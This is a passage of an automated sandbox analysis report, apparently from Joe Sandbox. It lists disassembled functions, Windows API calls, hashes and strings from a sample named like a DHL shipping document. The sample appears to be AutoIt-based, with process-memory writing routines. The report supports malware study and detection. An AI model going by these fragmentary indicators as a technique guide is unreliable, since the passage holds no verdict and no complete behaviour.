                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: a67595812ecb0845d29dad65dab548031eb2ba8378ea78fb1d73649cb80b00cd
                                                                                            • Instruction ID: 408edb30e4d4cf5f8d842cc22e7d7d733cd76859fb2a1ac467bcc10f3cb9fcab
                                                                                            • Opcode Fuzzy Hash: a67595812ecb0845d29dad65dab548031eb2ba8378ea78fb1d73649cb80b00cd
                                                                                            • Instruction Fuzzy Hash: EC01A272800B159FCB30AF66D880412F7F5FF503153198A3FD19692A31C371A954EF80
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0085D752
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085D764
                                                                                            • _free.LIBCMT ref: 0085D776
                                                                                            • _free.LIBCMT ref: 0085D788
                                                                                            • _free.LIBCMT ref: 0085D79A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: dde47df4225a5637febab7dd4ae4c964382fce3c4a7f8b8ebc214f326ba33533
                                                                                            • Instruction ID: 7dec557a671a2e3547f34d2445dd5e11bad4ed8ea04135df25f98498ebbb43d5
                                                                                            • Opcode Fuzzy Hash: dde47df4225a5637febab7dd4ae4c964382fce3c4a7f8b8ebc214f326ba33533
                                                                                            • Instruction Fuzzy Hash: E9F06232904358AB8635FB68F9C1D567FDDFB093127A40805FC48EB602CB30FC888661
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00885C58
                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00885C6F
                                                                                            • MessageBeep.USER32(00000000), ref: 00885C87
                                                                                            • KillTimer.USER32(?,0000040A), ref: 00885CA3
                                                                                            • EndDialog.USER32(?,00000001), ref: 00885CBD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3741023627-0
                                                                                            • Opcode ID: 5bd1ee65c6ea364970dc66a1776b0753d3a3f41eac9496d728444371ef4d23e5
                                                                                            • Instruction ID: 7c145ce4f2d8db9802031e8f0bb1f71ff064e6598b27834bfff831947396017d
                                                                                            • Opcode Fuzzy Hash: 5bd1ee65c6ea364970dc66a1776b0753d3a3f41eac9496d728444371ef4d23e5
                                                                                            • Instruction Fuzzy Hash: 96018170500B04ABEB316B50EE4EFA67BB9FB11B05F00165DA583E14E1DBF4A9848F90
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 008522BE
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 008522D0
                                                                                            • _free.LIBCMT ref: 008522E3
                                                                                            • _free.LIBCMT ref: 008522F4
                                                                                            • _free.LIBCMT ref: 00852305
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: ab5d33abed9099bfe3ccb74e3314f8dbf315286b4d68f5a0f2b41280ddd1d614
                                                                                            • Instruction ID: 327638ac579cbb3ec002d0632501a2a7c28073ea663e75c945c8813a94b41d38
                                                                                            • Opcode Fuzzy Hash: ab5d33abed9099bfe3ccb74e3314f8dbf315286b4d68f5a0f2b41280ddd1d614
                                                                                            • Instruction Fuzzy Hash: F2F05E748101209F8A12EFB8BC41DA83F64F71A762B00051AF824E63B6CF310816EFE5
                                                                                            APIs
                                                                                            • EndPath.GDI32(?), ref: 008395D4
                                                                                            • StrokeAndFillPath.GDI32(?,?,008771F7,00000000,?,?,?), ref: 008395F0
                                                                                            • SelectObject.GDI32(?,00000000), ref: 00839603
                                                                                            • DeleteObject.GDI32 ref: 00839616
                                                                                            • StrokePath.GDI32(?), ref: 00839631
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                            • String ID:
                                                                                            • API String ID: 2625713937-0
                                                                                            • Opcode ID: fd770c88f94220a4a7a089632a6bcfb7707d40b65b59d18b72f91f8881bca418
                                                                                            • Instruction ID: 17d0a58f0a7d09945232d3f5c2fafe85aac32f4a11e542857daf625c537dec72
                                                                                            • Opcode Fuzzy Hash: fd770c88f94220a4a7a089632a6bcfb7707d40b65b59d18b72f91f8881bca418
                                                                                            • Instruction Fuzzy Hash: 0EF03730106608EBDB226F69ED1CB793F65FB50322F448314F4A5A50F0E7B08996DFA0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __freea$_free
                                                                                            • String ID: a/p$am/pm
                                                                                            • API String ID: 3432400110-3206640213
                                                                                            • Opcode ID: 6ae192aff7030181fbc16dd3736c98fd5c25ea1e083e714515d7381dcd29f6a6
                                                                                            • Instruction ID: ecd2e40f53dbb97b11ddcc68afd3e6a8d065abbf70c1e87705f6ca2866ec0964
                                                                                            • Opcode Fuzzy Hash: 6ae192aff7030181fbc16dd3736c98fd5c25ea1e083e714515d7381dcd29f6a6
                                                                                            • Instruction Fuzzy Hash: 0AD1D03190020A9ACF249F68C8ADBFAB7B1FF05706F240159ED01DBB90D3799D88CB91
                                                                                            APIs
                                                                                              • Part of subcall function 00840242: EnterCriticalSection.KERNEL32(008F070C,008F1884,?,?,0083198B,008F2518,?,?,?,008212F9,00000000), ref: 0084024D
                                                                                              • Part of subcall function 00840242: LeaveCriticalSection.KERNEL32(008F070C,?,0083198B,008F2518,?,?,?,008212F9,00000000), ref: 0084028A
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008400A3: __onexit.LIBCMT ref: 008400A9
                                                                                            • __Init_thread_footer.LIBCMT ref: 008A7BFB
                                                                                              • Part of subcall function 008401F8: EnterCriticalSection.KERNEL32(008F070C,?,?,00838747,008F2514), ref: 00840202
                                                                                              • Part of subcall function 008401F8: LeaveCriticalSection.KERNEL32(008F070C,?,00838747,008F2514), ref: 00840235
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                            • API String ID: 535116098-3733170431
                                                                                            • Opcode ID: 2c0595cbd0f0a5edcbe0164e8ecc8c90e628c96f5b6b15791f84243a1aa8d376
                                                                                            • Instruction ID: f151f78f4c8fef578b6395bbf23c23522b9413eb90ada36eca824f86bbeddf11
                                                                                            • Opcode Fuzzy Hash: 2c0595cbd0f0a5edcbe0164e8ecc8c90e628c96f5b6b15791f84243a1aa8d376
                                                                                            • Instruction Fuzzy Hash: BB918A70A04209EFDB04EF98D8909BDB7B1FF4A304F108059F906DB692DB71AE85EB51
                                                                                            APIs
                                                                                              • Part of subcall function 0088B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008821D0,?,?,00000034,00000800,?,00000034), ref: 0088B42D
                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00882760
                                                                                              • Part of subcall function 0088B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0088B3F8
                                                                                              • Part of subcall function 0088B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0088B355
                                                                                              • Part of subcall function 0088B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00882194,00000034,?,?,00001004,00000000,00000000), ref: 0088B365
                                                                                              • Part of subcall function 0088B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00882194,00000034,?,?,00001004,00000000,00000000), ref: 0088B37B
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008827CD
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0088281A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                            • String ID: @
                                                                                            • API String ID: 4150878124-2766056989
                                                                                            • Opcode ID: 9472b3fcb64b1668346078721449f316ae2c17777778b986efa1709231428af6
                                                                                            • Instruction ID: 34f58f54379466b7df2a31b193c88d71579e6168854153d747ff56b3c227e9a3
                                                                                            • Opcode Fuzzy Hash: 9472b3fcb64b1668346078721449f316ae2c17777778b986efa1709231428af6
                                                                                            • Instruction Fuzzy Hash: 29410D76900218BFDB10EBA8CD45ADEBBB8FF49700F104059FA55B7181DB706E45CB61
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL 0737-12182024.exe,00000104), ref: 00851769
                                                                                            • _free.LIBCMT ref: 00851834
                                                                                            • _free.LIBCMT ref: 0085183E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$FileModuleName
                                                                                            • String ID: C:\Users\user\Desktop\DHL 0737-12182024.exe
                                                                                            • API String ID: 2506810119-1900443643
                                                                                            • Opcode ID: 29e363d5de06b27941286483541d58b49236fffbd4eed48ec0a8b4fb7e75b39f
                                                                                            • Instruction ID: fefee21b81d007d1c3a9f8b5787193eb48e5baa05f2076db7bf14d42bb0924f4
                                                                                            • Opcode Fuzzy Hash: 29e363d5de06b27941286483541d58b49236fffbd4eed48ec0a8b4fb7e75b39f
                                                                                            • Instruction Fuzzy Hash: C9314175A00218EFDF21DBAD9889EAEBBBCFB89311B144166F904D7211D6B04E48CB91
                                                                                            APIs
                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0088C306
                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0088C34C
                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008F1990,00B38200), ref: 0088C395
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                            • String ID: 0
                                                                                            • API String ID: 135850232-4108050209
                                                                                            • Opcode ID: 4be5835d2f65fa5488371d427a6e7a2b2530fd2c7b5bbeb39f9fa0803f0a2216
                                                                                            • Instruction ID: 300111c609ac8fdfbc09966aa5a700ea6c5693518dddf30f243c722bbb209c83
                                                                                            • Opcode Fuzzy Hash: 4be5835d2f65fa5488371d427a6e7a2b2530fd2c7b5bbeb39f9fa0803f0a2216
                                                                                            • Instruction Fuzzy Hash: 9F418C712043019FD720EF29D885B5ABBE8FF85324F148A2DF9A5D7395D730A905CB62
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008BCC08,00000000,?,?,?,?), ref: 008B44AA
                                                                                            • GetWindowLongW.USER32 ref: 008B44C7
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008B44D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID: SysTreeView32
                                                                                            • API String ID: 847901565-1698111956
                                                                                            • Opcode ID: ba7880ca345cf238305407f9e7ed0cc1680e11c26a28ec1dcea8980e5390bcaf
                                                                                            • Instruction ID: 5cc221d2ebbbf665f0295afe85163a045879706e527ba4dd40ca024305319a70
                                                                                            • Opcode Fuzzy Hash: ba7880ca345cf238305407f9e7ed0cc1680e11c26a28ec1dcea8980e5390bcaf
                                                                                            • Instruction Fuzzy Hash: 82317C31210605AFDB208E38DC46BEA7BA9FB09334F205725F975E22E1D770AC609760
                                                                                            APIs
                                                                                              • Part of subcall function 008A335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,008A3077,?,?), ref: 008A3378
                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 008A307A
                                                                                            • _wcslen.LIBCMT ref: 008A309B
                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 008A3106
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 946324512-2422070025
                                                                                            • Opcode ID: 9e961d643ef4d58f468c8d882eee1d46aabd50e47c993628cf0e9855970004ba
                                                                                            • Instruction ID: ce34499bf2ea28538ce19d4e499a89e61dc4cba7b14752cb919707c5c3f2e163
                                                                                            • Opcode Fuzzy Hash: 9e961d643ef4d58f468c8d882eee1d46aabd50e47c993628cf0e9855970004ba
                                                                                            • Instruction Fuzzy Hash: EA31D5352042059FEB10CF68C485E6A77E0FF16318F248069F915CBB92DB71DE45C761
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 008B4705
                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 008B4713
                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008B471A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                            • String ID: msctls_updown32
                                                                                            • API String ID: 4014797782-2298589950
                                                                                            • Opcode ID: cb2dc76f2b84d5ca85b3e7a9c638ac75b1ad5fe04553384d9f9699f357fdf254
                                                                                            • Instruction ID: f41f41544404f165ecc57f6acc3ed1bfcca901f036074bac7e7398bc839528b6
                                                                                            • Opcode Fuzzy Hash: cb2dc76f2b84d5ca85b3e7a9c638ac75b1ad5fe04553384d9f9699f357fdf254
                                                                                            • Instruction Fuzzy Hash: BB215EB5600209AFEB10DF68DC86DBB37ADFB5A3A4B040059FA01DB351DB71EC51CA61
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                            • API String ID: 176396367-2734436370
                                                                                            • Opcode ID: 56f43e7dfa4b099e7390dd3175be2631fcf7817a2b4dee218c1fe1a4a65f8b6b
                                                                                            • Instruction ID: 4d6d32ae97b2f33d155eddf36c73b09ccc9b83452c6f09111c876344f106966e
                                                                                            • Opcode Fuzzy Hash: 56f43e7dfa4b099e7390dd3175be2631fcf7817a2b4dee218c1fe1a4a65f8b6b
                                                                                            • Instruction Fuzzy Hash: 9D210872204525A6D331FA299C02FBB7398FFA1314F184426F98AD7142FB55AD41C3D6
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 008B3840
                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 008B3850
                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 008B3876
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MoveWindow
                                                                                            • String ID: Listbox
                                                                                            • API String ID: 3315199576-2633736733
                                                                                            • Opcode ID: 809aee167c13ec829ac24e4475a0f878bc26d14c4bca9fcc8f99c5683435e168
                                                                                            • Instruction ID: 65fb2f60acfb634c3845cbb02970194d83a451165f47ebb80085023cf6bbeee2
                                                                                            • Opcode Fuzzy Hash: 809aee167c13ec829ac24e4475a0f878bc26d14c4bca9fcc8f99c5683435e168
                                                                                            • Instruction Fuzzy Hash: DA218E72610218BBEF218F65DC85EFB376EFF89754F118124F9149B290CA71DC5287A0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00894A08
                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00894A5C
                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,008BCC08), ref: 00894AD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                            • String ID: %lu
                                                                                            • API String ID: 2507767853-685833217
                                                                                            • Opcode ID: 27a2bd5f7235354bda5fcf49e570d3f834f32b869e0f9f4d7df9ebaf5c5707b6
